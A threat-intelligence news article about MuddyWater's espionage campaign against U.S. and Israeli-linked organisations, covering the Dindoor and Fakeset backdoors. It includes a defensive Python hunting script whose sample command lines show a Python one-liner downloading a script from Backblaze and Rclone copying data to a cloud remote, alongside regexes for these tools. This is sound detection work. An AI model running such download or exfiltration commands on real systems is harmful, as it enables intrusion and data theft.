Iranian Cyber Group MuddyWater Targets U.S. Networks with New Dindoor Backdoor in Espionage Campaign

Recent investigations by Broadcom’s Symantec and the Carbon Black Threat Hunter Team have unveiled a sophisticated cyber espionage campaign orchestrated by the Iranian state-sponsored hacking group known as MuddyWater, also referred to as Seedworm. This group, affiliated with Iran’s Ministry of Intelligence and Security (MOIS), has successfully infiltrated multiple U.S. organizations, including banks, airports, non-profits, and the Israeli division of a software company.

Campaign Overview

The campaign is believed to have commenced in early February 2026, with a noticeable uptick in activity following recent military actions by the U.S. and Israel against Iran. MuddyWater’s primary objective appears to be the establishment of persistent access within these networks to facilitate intelligence gathering and potential disruption.

Targeted Entities

Among the affected organizations is a software company that supplies the defense and aerospace industries and maintains operations in Israel. The Israeli branch of this company seems to have been the focal point of MuddyWater’s activities. Additionally, a U.S. bank and a Canadian non-profit organization have been compromised, indicating the group’s broad targeting strategy.

Introduction of the Dindoor Backdoor

A significant aspect of this campaign is the deployment of a previously unidentified backdoor named Dindoor. This malware leverages the Deno JavaScript runtime environment to execute its payloads, showcasing MuddyWater’s adaptability and technical sophistication. The use of Deno suggests an effort to evade detection by utilizing less commonly monitored execution environments.

Data Exfiltration Attempts

Investigators have identified attempts to exfiltrate data from the compromised software company using Rclone, a command-line program for managing files on cloud storage. The data was intended to be transferred to a Wasabi cloud storage bucket. However, it remains unclear whether these exfiltration efforts were successful.

Deployment of the Fakeset Backdoor

In addition to Dindoor, MuddyWater has deployed another backdoor known as Fakeset within the networks of a U.S. airport and a non-profit organization. Fakeset is Python-based malware downloaded from servers belonging to Backblaze, an American cloud storage and data backup company. Notably, the digital certificate used to sign Fakeset has also been associated with other malware strains such as Stagecomp and Darkcomp, both previously linked to MuddyWater.
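As an added illustration (not code from the Symantec/Carbon Black research), the following Python hunts constructed process command lines for the three behaviours described above: a Deno runtime executing a script, Rclone copying data to a cloud remote, and Python fetching a payload from Backblaze. The Backblaze download domain, the Rclone remote alias and every sample command line are assumptions made for the example, not indicators from the report.

```python
"""Hunting heuristics for the tradecraft described in this report (Deno-hosted
backdoor, Rclone exfiltration to cloud storage, Python payload pulled from
Backblaze). Every command line below is constructed for illustration; the
rules key on generic behaviour, not on any indicator from the report."""
import re
from dataclasses import dataclass

@dataclass
class Finding:
    rule: str
    cmdline: str

# Endpoint assumed for illustration: Backblaze B2 downloads go through
# *.backblazeb2.com. The Rclone rule deliberately does not match the
# remote alias (attacker-chosen, here "remote-wasabi"); it flags any
# copy/sync/move whose target looks like <alias>:<path> rather than a
# drive letter, so the Wasabi case and any other cloud remote both trip it.
RULES = [
    ("deno_runtime_exec",
     re.compile(r"(?:^|[\\/\s])deno(?:\.exe)?\s+run\b", re.I)),
    ("rclone_to_cloud_remote",
     re.compile(r"\brclone\b.*\b(?:copy|sync|move)\b.*\s[A-Za-z][\w-]+:", re.I)),
    ("python_fetch_backblaze",
     re.compile(r"\bpython(?:3|\.exe)?\b.*backblazeb2\.com", re.I)),
]

# Constructed sample telemetry: three suspicious command lines and one benign.
SAMPLE_CMDLINES = [
    r"C:\Users\jdoe\AppData\Local\deno\deno.exe run -A C:\Users\jdoe\AppData\Roaming\update.js",
    r"rclone.exe copy D:\Projects remote-wasabi:staging-bucket --transfers 8",
    "python.exe -c \"import urllib.request as u;"
    "u.urlretrieve('https://f000.backblazeb2.com/file/pkg/setup.py','s.py')\"",
    r"C:\Windows\System32\notepad.exe C:\Users\mlee\notes.txt",
]

def scan(cmdlines):
    """Return one Finding per (rule, command line) match, in input order."""
    findings = []
    for cmd in cmdlines:
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(name, cmd))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.rule}] {f.cmdline}")
```

These patterns are a starting point for triage, not a signature: a legitimate developer running Deno or an administrator using Rclone will also match, so the findings should be reviewed against parent process, user and host context.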

Implications and Analysis

The use of the same digital certificates across different malware variants suggests a coordinated effort by MuddyWater to maintain persistent access and control over compromised networks. This tactic also indicates an attempt to streamline their operations and reduce the likelihood of detection by security systems.

Security experts have observed that Iranian threat actors have significantly enhanced their capabilities in recent years. Their tooling and malware have become more sophisticated, and they have demonstrated strong social engineering skills, including spear-phishing campaigns and honeytrap operations. These methods are used to build relationships with targets to gain access to accounts or sensitive information.

Contextual Background

The findings emerge amidst escalating military conflicts involving Iran, which have triggered a surge in cyber activities. Research from Check Point has revealed that pro-Palestinian hacktivist groups, such as Handala Hack (also known as Void Manticore), have been routing their operations through Starlink IP ranges to probe externally facing applications for misconfigurations and weak credentials.

Furthermore, multiple Iran-affiliated adversaries, including Agrius (also known as Agonizing Serpens, Marshtreader, and Pink Sandstorm), have been observed scanning for vulnerable Hikvision cameras and video intercom solutions using known security flaws. The targeting has intensified in the wake of the current Middle East conflict, with exploitation attempts against IP cameras surging in Israel and Gulf countries, including the U.A.E., Qatar, Bahrain, and Kuwait, as well as Lebanon and Cyprus.

Conclusion

The recent activities of MuddyWater underscore the evolving threat landscape posed by state-sponsored cyber actors. Their ability to develop and deploy new malware variants like Dindoor and Fakeset, coupled with sophisticated social engineering tactics, highlights the need for organizations to enhance their cybersecurity measures. Continuous monitoring, employee training, and the implementation of robust security protocols are essential to defend against such advanced persistent threats.